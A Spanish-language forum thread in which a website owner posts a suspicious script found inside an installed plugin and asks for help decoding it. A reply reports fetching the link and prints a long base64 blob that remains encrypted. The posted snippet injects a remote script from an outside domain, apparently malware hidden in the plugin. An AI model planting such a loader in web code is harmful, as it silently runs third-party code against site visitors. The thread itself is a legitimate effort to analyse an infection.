Hola a todos, vengo a que me echeis una mano si es posible.
He encontrado este .js en el codigo de un plugin que he instalado en mi web, tiene muy mala pinta pero no logro desencriptarlo, me gustaria realmente saber el codigo real y ver que es ya que no tengo ni idea.
Gracias y un saludo.
Código:
<script>
document.write("<script src='https:\/\/www.makelele.org\/script\/stats.js?'"+window.btoa(parseInt(Date.now()))+"><\/script>");
</script>
La unica parte ofuscada en el codigo que comentaste solo tiene el link ofuscado.
Luego de haberlo desofuscada entre en ese link, me aparecio un codigo en base64, lo descodifique pero el codigo esta encriptado.
Este es el texto codificado a base64:
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
Para descodificarlo puedes usar un codificador/decodificador online o puedes usar python (como lo hice yo):
print "texto".decode("base64")
te aparecera el texto pero esta encriptado. :/